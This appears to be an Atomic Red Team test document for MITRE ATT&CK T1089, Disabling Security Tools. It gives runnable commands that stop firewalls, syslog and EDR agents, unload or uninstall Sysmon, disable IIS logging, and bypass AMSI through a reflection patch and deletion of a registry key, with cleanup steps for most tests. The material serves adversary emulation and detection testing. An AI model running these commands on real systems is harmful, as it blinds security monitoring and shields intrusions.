CircleCI Atomic Red Team doc generator
286 lines
6.5 KiB
Markdown
286 lines
6.5 KiB
Markdown
# T1089 - Disabling Security Tools
|
|
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1089)
|
|
<blockquote>Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.</blockquote>
|
|
|
|
## Atomic Tests
|
|
|
|
- [Atomic Test #1 - Disable iptables firewall](#atomic-test-1---disable-iptables-firewall)
|
|
|
|
- [Atomic Test #2 - Disable syslog](#atomic-test-2---disable-syslog)
|
|
|
|
- [Atomic Test #3 - Disable Cb Response](#atomic-test-3---disable-cb-response)
|
|
|
|
- [Atomic Test #4 - Disable SELinux](#atomic-test-4---disable-selinux)
|
|
|
|
- [Atomic Test #5 - Disable Carbon Black Response](#atomic-test-5---disable-carbon-black-response)
|
|
|
|
- [Atomic Test #6 - Disable LittleSnitch](#atomic-test-6---disable-littlesnitch)
|
|
|
|
- [Atomic Test #7 - Disable OpenDNS Umbrella](#atomic-test-7---disable-opendns-umbrella)
|
|
|
|
- [Atomic Test #8 - Unload Sysmon Filter Driver](#atomic-test-8---unload-sysmon-filter-driver)
|
|
|
|
- [Atomic Test #9 - Disable Windows IIS HTTP Logging](#atomic-test-9---disable-windows-iis-http-logging)
|
|
|
|
- [Atomic Test #10 - Uninstall Sysmon](#atomic-test-10---uninstall-sysmon)
|
|
|
|
- [Atomic Test #11 - AMSI Bypass - AMSI InitFailed](#atomic-test-11---amsi-bypass---amsi-initfailed)
|
|
|
|
- [Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-12---amsi-bypass---remove-amsi-provider-reg-key)
|
|
|
|
|
|
<br/>
|
|
|
|
## Atomic Test #1 - Disable iptables firewall
|
|
Disables the iptables firewall
|
|
|
|
**Supported Platforms:** Linux
|
|
|
|
|
|
#### Run it with `sh`!
|
|
```
|
|
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
|
|
then
|
|
service iptables stop
|
|
chkconfig off iptables
|
|
service ip6tables stop
|
|
chkconfig off ip6tables
|
|
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
|
|
systemctl stop firewalld
|
|
systemctl disable firewalld
|
|
fi
|
|
```
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #2 - Disable syslog
|
|
Disables syslog collection
|
|
|
|
**Supported Platforms:** Linux
|
|
|
|
|
|
#### Run it with `sh`!
|
|
```
|
|
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
|
|
then
|
|
service rsyslog stop
|
|
chkconfig off rsyslog
|
|
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
|
|
systemctl stop rsyslog
|
|
systemctl disable rsyslog
|
|
fi
|
|
```
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #3 - Disable Cb Response
|
|
Disable the Cb Response service
|
|
|
|
**Supported Platforms:** Linux
|
|
|
|
|
|
#### Run it with `sh`!
|
|
```
|
|
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
|
|
then
|
|
service cbdaemon stop
|
|
chkconfig off cbdaemon
|
|
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
|
|
systemctl stop cbdaemon
|
|
systemctl disable cbdaemon
|
|
fi
|
|
```
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #4 - Disable SELinux
|
|
Disables SELinux enforcement
|
|
|
|
**Supported Platforms:** Linux
|
|
|
|
|
|
#### Run it with `sh`!
|
|
```
|
|
setenforce 0
|
|
```
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #5 - Disable Carbon Black Response
|
|
Disables Carbon Black Response
|
|
|
|
**Supported Platforms:** macOS
|
|
|
|
|
|
#### Run it with `sh`!
|
|
```
|
|
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
|
|
```
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #6 - Disable LittleSnitch
|
|
Disables LittleSnitch
|
|
|
|
**Supported Platforms:** macOS
|
|
|
|
|
|
#### Run it with `sh`!
|
|
```
|
|
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
|
|
```
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #7 - Disable OpenDNS Umbrella
|
|
Disables OpenDNS Umbrella
|
|
|
|
**Supported Platforms:** macOS
|
|
|
|
|
|
#### Run it with `sh`!
|
|
```
|
|
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
|
|
```
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #8 - Unload Sysmon Filter Driver
|
|
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
#### Inputs
|
|
| Name | Description | Type | Default Value |
|
|
|------|-------------|------|---------------|
|
|
| sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv|
|
|
|
|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
|
|
```
|
|
fltmc.exe unload #{sysmon_driver}
|
|
```
|
|
|
|
#### Commands to Check Prerequisites:
|
|
```
|
|
fltmc.exe filters | findstr #{sysmon_driver}
|
|
```
|
|
|
|
#### Cleanup Commands:
|
|
```
|
|
sc stop sysmon
|
|
fltmc.exe load #{sysmon_driver}
|
|
sc start sysmon
|
|
```
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #9 - Disable Windows IIS HTTP Logging
|
|
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
|
|
This action requires HTTP logging configurations in IIS to be unlocked.
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
#### Inputs
|
|
| Name | Description | Type | Default Value |
|
|
|------|-------------|------|---------------|
|
|
| website_name | The name of the website on a server | string | Default Web Site|
|
|
|
|
#### Run it with `command_prompt`!
|
|
```
|
|
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
|
|
```
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #10 - Uninstall Sysmon
|
|
Uninstall Sysinternals Sysmon for Defense Evasion
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
|
|
```
|
|
sysmon -u
|
|
```
|
|
|
|
#### Commands to Check Prerequisites:
|
|
```
|
|
sc query sysmon > nul
|
|
```
|
|
|
|
#### Cleanup Commands:
|
|
```
|
|
sysmon -i -accepteula
|
|
```
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #11 - AMSI Bypass - AMSI InitFailed
|
|
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
|
|
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
#### Run it with `powershell`!
|
|
```
|
|
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
|
|
```
|
|
|
|
|
|
#### Cleanup Commands:
|
|
```
|
|
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
|
|
```
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key
|
|
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
|
|
This test removes the Windows Defender provider registry key.
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
|
|
```
|
|
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
|
|
```
|
|
|
|
|
|
#### Cleanup Commands:
|
|
```
|
|
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
|
|
```
|
|
|
|
<br/>
|